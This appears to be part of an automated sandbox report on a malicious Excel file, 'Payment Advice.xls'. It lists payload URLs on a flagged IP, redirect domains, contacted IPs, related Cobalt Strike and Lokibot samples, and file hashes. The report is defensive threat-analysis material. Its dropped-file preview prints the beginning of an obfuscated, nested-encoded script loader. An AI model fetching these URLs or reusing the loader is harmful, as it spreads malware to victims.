http://www.diginotar.nl/cps/pkioverheid0	mshta.exe, 00000004.00000003.435287605.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438014891.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434956506.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.0000000004545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.487305558.0000000004545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482261681.0000000004557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004558000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://go.micros	powershell.exe, 00000005.00000002.483382869.000000000342E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.go	powershell.exe, 0000001B.00000002.564793899.0000000000170000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://qrisni.me/O	mshta.exe, 00000004.00000002.437120084.00000000001B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435304454.00000000001B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434998134.00000000001B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/viderC	mshta.exe, 0000000B.00000003.487305558.000000000450C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.000000000450C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.gop	powershell.exe, 00000011.00000002.549107311.0000000002624000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.567313664.0000000002752000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000003.435287605.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438014891.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434956506.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.0000000004545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.487305558.0000000004545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482261681.0000000004557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004558000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta...v	mshta.exe, 0000000B.00000003.484724170.00000000002CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482193000.00000000002CB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htaha	mshta.exe, 00000004.00000002.437957944.00000000036D0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000005.00000002.490599688.00000000120A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.490599688.00000000120A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com	powershell.exe, 00000011.00000002.549107311.0000000002624000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.567313664.0000000002752000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com	powershell.exe, 00000011.00000002.549107311.00000000027E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.567313664.0000000002922000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htapV	mshta.exe, 0000000B.00000003.487305558.000000000450C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.000000000450C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net0D	mshta.exe, 00000004.00000003.435287605.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438014891.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434956506.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482261681.0000000004557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004558000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.483382869.0000000002071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.497828214.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.549107311.0000000002411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.567313664.0000000002551000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://qrisni.me/pV	mshta.exe, 0000000B.00000003.487565897.0000000000300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484724170.0000000000300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482193000.0000000000300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.488759413.0000000000300000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000003.435287605.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438014891.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434956506.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.0000000004545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.487305558.000000000450C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.487305558.0000000004545000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.000000000450C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482261681.0000000004557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004558000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://qrisni.me/4	mshta.exe, 0000000B.00000003.482261681.0000000004591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004591000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htahttp://192.3.176.141/4	mshta.exe, 00000004.00000003.435816776.0000000002F35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484482122.00000000034A5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.486572941.00000000034A5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://192.3.176.141/vider	mshta.exe, 0000000B.00000003.487305558.000000000450C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489443397.000000000450C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000003.435287605.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.438014891.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434956506.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482261681.0000000004557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004558000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://qrisni.me/8qnMUw?&italian=tough&bladder=wrathful&singer=juvenile&tugboat=nebulous&poignance=	mshta.exe, 0000000B.00000002.488759413.000000000029F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.489505745.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484724170.0000000000300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.488759413.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484724170.000000000029F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482193000.0000000000300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.487565897.00000000002E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.488759413.0000000000300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.488759413.00000000002E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482193000.000000000029F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484724170.00000000002CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482193000.00000000002CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482193000.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.484670098.0000000004558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.482261681.0000000004557000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.487565897.000000000029F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.485115130.0000000004558000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.xls, DA430000.0.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.3.176.141	unknown	United States	36352	AS-COLOCROSSINGUS	true
142.250.186.46	drive.google.com	United States	15169	GOOGLEUS	false
188.114.97.3	qrisni.me	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false
94.156.177.220	unknown	Bulgaria	43561	NET1-ASBG	true
142.250.185.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542326
Start date and time:	2024-10-25 19:45:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Sample name:	Payment Advice.xls
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLS@34/47@7/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target mshta.exe, PID 3336 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3832 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Payment Advice.xls

Simulations

Behavior and APIs

Time	Type	Description
13:46:29	API Interceptor	108x Sleep call for process: mshta.exe modified
13:46:34	API Interceptor	1030x Sleep call for process: powershell.exe modified
13:46:51	API Interceptor	17x Sleep call for process: wscript.exe modified
13:47:28	API Interceptor	308x Sleep call for process: aspnet_regbrowsers.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.3.176.141	seethebestthingsevermeetwithgreatthingstobegood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
	greatthingswithgoodnewsgivenbygodthingsgreat.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
	seethebestthingstobegoodwithhislifebestthigns.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
	nicegirlwithnewthingswhichevennobodknowthatkissingme.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	192.3.176.141/35/SMLPERR.txt
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/36/LOGS%20LOKI.txt
	Logs.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141/43/LCRDDFR.txt
	logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
	greatwayforbestthignswithwhonotwanttodo.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
	PPM435679.xls	Get hash	malicious	Unknown	Browse	192.3.176.141/551/cw/nicevisionnicemagicalthinsforentirelifetogetmebackwithgreat.hta
188.114.97.3	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/KXy1F
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse	77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
	PO-000041522.exe	Get hash	malicious	FormBook	Browse	www.freedietbuilder.online/nnla/
	http://onlinecheapflights.net/	Get hash	malicious	Unknown	Browse	onlinecheapflights.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
qrisni.me	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	PO%20K22012FA[1].docx	Get hash	malicious	Unknown	Browse	188.114.96.3
	#PO247762.docx	Get hash	malicious	Remcos	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	43655- Urgent - Request for Quotation.exe	Get hash	malicious	Remcos	Browse	192.210.150.35
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	23.95.194.49
	seethebestthingsevermeetwithgreatthingstobegood.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	greatthingswithgoodnewsgivenbygodthingsgreat.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	seethebestthingstobegoodwithhislifebestthigns.hta	Get hash	malicious	Cobalt Strike	Browse	192.3.176.141
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	107.174.214.206
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	172.245.19.71
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	104.168.36.51
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	192.3.179.174
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	23.94.171.157
CLOUDFLARENETUS	https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Oct25_2024.htm	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.17.25.14
	https://accesspage853.ubpages.com/4k5-ffdfg	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Order Specifications for Materials.docx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://asgardcapitalpartners-sharepoint.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	cabbage.exe	Get hash	malicious	Atlantida Stealer	Browse	104.26.4.30
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
CLOUDFLARENETUS	https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Oct25_2024.htm	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.17.25.14
	https://accesspage853.ubpages.com/4k5-ffdfg	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Order Specifications for Materials.docx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://asgardcapitalpartners-sharepoint.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	cabbage.exe	Get hash	malicious	Atlantida Stealer	Browse	104.26.4.30
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	142.250.186.46 142.250.185.97
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.46 142.250.185.97
	transferencia interbancaria_66579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.250.186.46 142.250.185.97
	Comprobante de pago.xlam.xlsx	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.185.97
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.250.186.46 142.250.185.97
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	142.250.186.46 142.250.185.97
	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.185.97
	#PO247762.docx	Get hash	malicious	Remcos	Browse	142.250.186.46 142.250.185.97
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	142.250.186.46 142.250.185.97
	PO NAHK22012FA00000.docx.doc	Get hash	malicious	Remcos	Browse	142.250.186.46 142.250.185.97
7dcce5b76c8b17472d024758970a406b	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Credit_Details2251397102400024.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx	Get hash	malicious	Lokibot	Browse	188.114.97.3 188.114.96.3
	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3 188.114.96.3
	Shipping Documents WMLREF115900.xls	Get hash	malicious	Lokibot	Browse	188.114.97.3 188.114.96.3
	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category:	modified
Size (bytes):	209271
Entropy (8bit):	1.8971867642493168
Encrypted:	false
SSDEEP:	96:Eac75EdYJF9OfdYJh9OC/7oRD1gnQbPy9YhrrudYJOdYJEA9OqdYJG7T:EaA5EmFwfmhwYUZ2mOmEAwqm0T
MD5:	964A54D784F1CBEF1EFFAA3AB917FCBC
SHA1:	6D9D2657D1A8277A3427E0819E8260A2AC341E93
SHA-256:	862CE1B2CDC84BF1A2833D131159FB2B890E9BDB60BCBC689A5ACD9441B441D5
SHA-512:	C9E0B1CC0597C98F103A84CAB21E4FDF4B6D4306DB22F3EBD3BCCDF08870CF8CB38C7E58047F77F8375059A206294885C4ECA91ECA8CB14530336620868563CB
Malicious:	true
Preview:	<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%25252520language%2525253DJavaScript%2525253Em%2525253D%25252527%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CScRIPT%2525252520TYpe%252525253D%2525252522teXt/vBScrIPt%2525252522%252525253E%252525250ADIm%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:46:39 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	4.00189433218285
Encrypted:	false
SSDEEP:	24:H+e9E2UBdHkwKdNWI+ycuZhNnakS5PNnqSqd:WnLKd41ulna37qSK
MD5:	BD9B1E52B2D1455F9A242FFE3093BE22
SHA1:	9B3E38C8C1446329CFE95C14714A2AEA01F3E08B
SHA-256:	ED5A13961678B92196DD08CBA38BFBC1C124B74EABF02281A14E67DEE6711455
SHA-512:	B0A32029D875D8A7AB346588ED7B7F120F280D1D9FBF275AFF45557C44CD4D468E1CFC9ECB6EFE45CA9F2E288C8B4D51E42E6C3AE8E3638A620B21F4ED553D9B
Malicious:	false
